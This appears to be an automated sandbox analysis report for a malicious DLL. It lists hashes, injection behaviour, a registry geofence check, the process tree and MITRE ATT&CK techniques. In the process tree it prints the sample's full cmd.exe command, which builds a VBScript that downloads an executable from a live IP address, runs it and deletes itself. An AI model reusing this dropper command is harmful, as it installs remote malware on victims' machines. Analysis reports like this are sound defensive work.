3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3

General

Target

3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll
Size

5KB
MD5

4b128c58a8afdc3a838018142fdb4bea
SHA1

73a1f572471d6cb23de20258d3db4860f82cac1c
SHA256

3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3
SHA512

3b1a1afa0729ed7d4d5f1c1fb8188e4ee007ad353a68255cb110a7940719d827ea9fc9cffd9074261c2d308f50c6ef5c324672188d33c5f8c56c3d83a6656ede

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

cscript.exe

flow pid process

7 1016 cscript.exe

flow	pid	process
7	1016	cscript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	cscript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

rundll32.exe

description pid process target process

PID 2156 set thread context of 3884 2156 rundll32.exe rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	pid	process	target process
PID 2156 set thread context of 3884	2156	rundll32.exe	rundll32.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

rundll32.exerundll32.exerundll32.execmd.exe

description	pid	process	target process
PID 4476 wrote to memory of 2156	4476	rundll32.exe	rundll32.exe
PID 4476 wrote to memory of 2156	4476	rundll32.exe	rundll32.exe
PID 4476 wrote to memory of 2156	4476	rundll32.exe	rundll32.exe
PID 2156 wrote to memory of 3884	2156	rundll32.exe	rundll32.exe
PID 2156 wrote to memory of 3884	2156	rundll32.exe	rundll32.exe
PID 2156 wrote to memory of 3884	2156	rundll32.exe	rundll32.exe
PID 2156 wrote to memory of 3884	2156	rundll32.exe	rundll32.exe
PID 3884 wrote to memory of 4424	3884	rundll32.exe	cmd.exe
PID 3884 wrote to memory of 4424	3884	rundll32.exe	cmd.exe
PID 3884 wrote to memory of 4424	3884	rundll32.exe	cmd.exe
PID 4424 wrote to memory of 1016	4424	cmd.exe	cscript.exe
PID 4424 wrote to memory of 1016	4424	cmd.exe	cscript.exe
PID 4424 wrote to memory of 1016	4424	cmd.exe	cscript.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:4476

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll,#1
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3884

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c echo on error resume next >%TEMP%\Sz7Xk0.vbs && echo Set xPost = CreateObject("Msxml2.XMLHTTP") >>%TEMP%\Sz7Xk0.vbs && echo xPost.Open "GET","http://107.148.195.71/w_download.exe ",0 >>%TEMP%\Sz7Xk0.vbs && echo xPost.Send() >>%TEMP%\Sz7Xk0.vbs && echo Set aGet = CreateObject("ADODB.Stream") >>%TEMP%\Sz7Xk0.vbs && echo aGet.Mode = 3 >>%TEMP%\Sz7Xk0.vbs && echo aGet.Type = 1 >>%TEMP%\Sz7Xk0.vbs && echo aGet.Open() >>%TEMP%\Sz7Xk0.vbs && echo aGet.Write(xPost.responseBody) >>%TEMP%\Sz7Xk0.vbs && echo aGet.SaveToFile "%TEMP%\12345678.exe",2 >>%TEMP%\Sz7Xk0.vbs && echo wscript.sleep 1000 >>%TEMP%\Sz7Xk0.vbs && echo Set Shell = CreateObject("Wscript.Shell") >>%TEMP%\Sz7Xk0.vbs && echo Shell.Run ("%TEMP%\12345678.exe") >>%TEMP%\Sz7Xk0.vbs && echo CreateObject("Scripting.Filesystemobject").DeleteFile(WScript.ScriptFullName) >>%TEMP%\Sz7Xk0.vbs && cscript.exe //nologo %TEMP%\Sz7Xk0.vbs
4⤵
- Suspicious use of WriteProcessMemory
PID:4424

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\Sz7Xk0.vbs
5⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:1016

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Sz7Xk0.vbs
Filesize
558B

MD5
2f8fa35bb6829ce8ee55c2c69532c4a7

SHA1
f5a2a9f60c0ce0094d77a338ebe2574c8f4a58ed

SHA256
c43489b039542edcc3f573e258b6bd4f5fbe1ca646e3bd3c91cef3f2aea8dad6

SHA512
436cca14f204dd28b1e39821f720757ee03641ef084cfc99e89d61e3f36b3b047a1a9ccdd978db8a5460c3e09ad9b734aa2b47db9fb3ea784ef249b935e44f19

Download Submit
memory/1016-133-0x0000000000000000-mapping.dmp

Download
memory/2156-130-0x0000000000000000-mapping.dmp

Download
memory/3884-131-0x0000000000000000-mapping.dmp

Download
memory/4424-132-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing